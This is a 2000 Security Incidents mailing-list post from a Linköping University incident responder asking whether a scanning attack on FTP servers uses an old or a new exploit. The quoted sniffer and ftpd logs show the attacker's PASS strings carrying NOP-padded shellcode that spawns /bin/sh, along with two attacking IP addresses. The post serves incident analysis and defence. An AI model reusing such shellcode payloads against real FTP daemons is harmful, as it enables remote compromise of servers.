Security Incidents mailing list archives

New or old FTP exploit?

From: Kent Engström <kent () UNIT LIU SE>
Date: Mon, 7 Aug 2000 19:17:00 +0200

Our /16 has been scanned at least two times from different foreign
addresses during the last weeks with an exploit that seems to be the
same. On both occasions, the connections are to port 21 with the
would-be intruder trying to log in as "USER ftp" and "PASS
long-string-with-nops-and-shellcode-in-it". From one of our users, I
got the following log saved by sniffit:

USER ftp
USER ftp
PASS 
1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^Ff¹ÿÿ°'Í1À^°=Í1À1Û^C1ÉþÉ1À^°
ÍþÉuó1ÀF  ^°=Íþ°0þÈF1ÀFvFóNV°Í1À1Û°Íèÿÿÿÿÿÿ0bin0sh1..11
PASS 
1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^Ff¹ÿÿ°'Í1À^°=Í1À1Û^C1ÉþÉ1À^°
ÍþÉuó1ÀF  ^°=Íþ°0þÈF1ÀFvFóNV°Í1À1Û°Íèÿÿÿÿÿÿ0bin0sh1..11


Another user sent me this:

Jul 22 05:47:16 yyyyy ftpd[11650]: ANONYMOUS FTP LOGIN FROM xxxxxxxxxxxxxxxxxxxx [xxx.xxx.xx.xx],
1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1À^^H°^LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11
Jul 22 05:47:27 yyyyy ftpd[11650]: FTP session closed Jul 22 07:48:13


Could somebody please tell me if this is an old exploit for some FTP
deamon, or a new exploit?

We have seen attacks coming from:
 200.255.45.90  ppp50.cruiser.com.br
 212.69.228.245 Legend Internet Ltd

--
Kent Engström,          Linköping University Incident Response Team
kent () unit liu se     abuse () liu se
+46 13 28 1744

UNIT, Linköping University; SE-581 83  LINKÖPING; SWEDEN

Current thread:

New or old FTP exploit? Kent Engström (Aug 07)
- Re: New or old FTP exploit? Przemyslaw Frasunek (Aug 09)
- Re: New or old FTP exploit? Fredrik Ostergren (Aug 10)
- Re: New or old FTP exploit? Bruce Dang (Aug 10)